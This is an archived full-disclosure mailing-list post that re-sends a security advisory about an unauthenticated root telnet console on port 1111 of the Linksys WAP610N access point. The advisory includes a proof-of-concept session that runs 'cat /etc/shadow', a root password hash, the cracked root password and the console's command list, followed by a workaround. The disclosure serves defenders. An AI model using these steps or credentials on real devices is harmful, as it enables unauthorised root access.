[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Linksys WAP610N Unauthenticated Root Console
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Linksys WAP610N Unauthenticated Root Console
- From: Matteo Ignaccolo <matteo.ignaccolo@xxxxxxxxxxxxxxxx>
- Date: Mon, 14 Feb 2011 21:47:39 +0100
The correct public disclosure date is 10/02/2011
In data Thursday 10 February 2011 00:12:10, Matteo Ignaccolo ha scritto:
> Secure Network - Security Research Advisory
>
> Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
> Systems affected: WAP610N (Firmware Version: 1.0.01)
> Systems not affected: --
> Severity: High
> Local/Remote: Remote
> Vendor URL: http://www.linksysbycisco.com
> Author(s): Matteo Ignaccolo m.ignaccolo@xxxxxxxxxxxxxxxx
> Vendor disclosure: 14/06/2010
> Vendor acknowledged: 14/06/2010
> Vendor bugfix: 14/12/2010 (reply to our request for update)
> Vendor patch release: ??
> Public disclosure: 10/02/2010
> Advisory number: SN-2010-08
> Advisory URL:
> http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt
>
>
> *** SUMMARY ***
>
> Linksys WAP610N is a SOHO wireless access point supporting 802.11n draft.
>
> Unauthenticated remote textual administration console has been found that
> allow an attacker to run system command as root user.
>
>
> *** VULNERABILITY DETAILS ***
>
> telnet <access-point IP> 1111
>
> Command> system id
> Output> uid=0(root) gid=0(root)
>
> Coomand> system cat /etc/shadow
> Ouptup> root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
> Ouptup> bin:*:10933:0:99999:7:::
> Ouptup> daemon:*:10933:0:99999:7:::
> Ouptup> adm:*:10933:0:99999:7:::
> Ouptup> lp:*:10933:0:99999:7:::
> Ouptup> sync:*:10933:0:99999:7:::
> Ouptup> shutdown:*:10933:0:99999:7:::
> Ouptup> halt:*:10933:0:99999:7:::
> Ouptup> uucp:*:10933
>
> root password is "wlan" (cracked with MDcrack http://mdcrack.openwall.net)
>
> List of console's command:
>
> ATHENA_READ
> ATHENA_WRITE
> CHIPVAR_GET
> DEBUGTABLE
> DITEM
> DMEM
> DREG16
> DREG32
> DREG8
> DRV_CAT_FREE
> DRV_CAT_INIT
> DRV_NAME_GET
> DRV_VAL_GET
> DRV_VAL_SET
> EXIT
> GENIOCTL
> GETMIB
> HELP
> HYP_READ
> HYP_WRITE
> HYP_WRITEBUFFER
> ITEM16
> ITEM32
> ITEM8
> ITEMLIST
> MACCALIBRATE
> MACVARGET
> MACVARSET
> MEM_READ
> MEM_WRITE
> MTAPI
> PITEMLIST
> PRINT_LEVEL
> PROM_READ
> PROM_WRITE
> READ_FILE
> REBOOT
> RECONF
> RG_CONF_GET
> RG_CONF_SET
> RG_SHELL
> SETMIB
> SHELL
> STR_READ
> STR_WRITE
> SYSTEM
> TEST32
> TFTP_GET
> TFTP_PUT
> VER
>
>
> *** EXPLOIT ***
>
> Attackers may exploit these issues through a common telnet client as
> explained above.
>
>
> *** FIX INFORMATION ***
>
> No patch is available.
>
> *** WORKAROUNDS ***
>
> Put access points on separate wired network and filter network traffic
> to/from 1111 tcp port.
>
>
> *********************
> *** LEGAL NOTICES ***
> *********************
>
> Secure Network (www.securenetwork.it) is an information security company,
> which provides consulting and training services, and engages in security
> research and development.
>
> We are committed to open, full disclosure of vulnerabilities, cooperating
> whenever possible with software developers for properly handling
> disclosure.
>
> This advisory is copyright 2009 Secure Network S.r.l. Permission is
> hereby granted for the redistribution of this alert, provided that it is
> not altered except by reformatting it, and that due credit is given. It
> may not be edited in any way without the express consent of Secure Network
> S.r.l. Permission is explicitly given for insertion in vulnerability
> databases and similars, provided that due credit is given to Secure
> Network.
>
> The information in the advisory is believed to be accurate at the time of
> publishing based on currently available information. This information is
> provided as-is, as a free service to the community by Secure Network
> research staff. There are no warranties with regard to this information.
> Secure Network does not accept any liability for any direct, indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.
>
> If you have any comments or inquiries, or any issue with what is reported
> in this advisory, please inform us as soon as possible.
>
> E-mail: securenetwork@xxxxxxxxxxxxxxxx
> GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
> Phone: +39 02 24 12 67 88
--
Dott. Ing. Matteo Ignaccolo
Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788 Mobile: +39 335.1778376
email: m.ignaccolo@xxxxxxxxxxxxxxxx
web: www.securenetwork.it
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/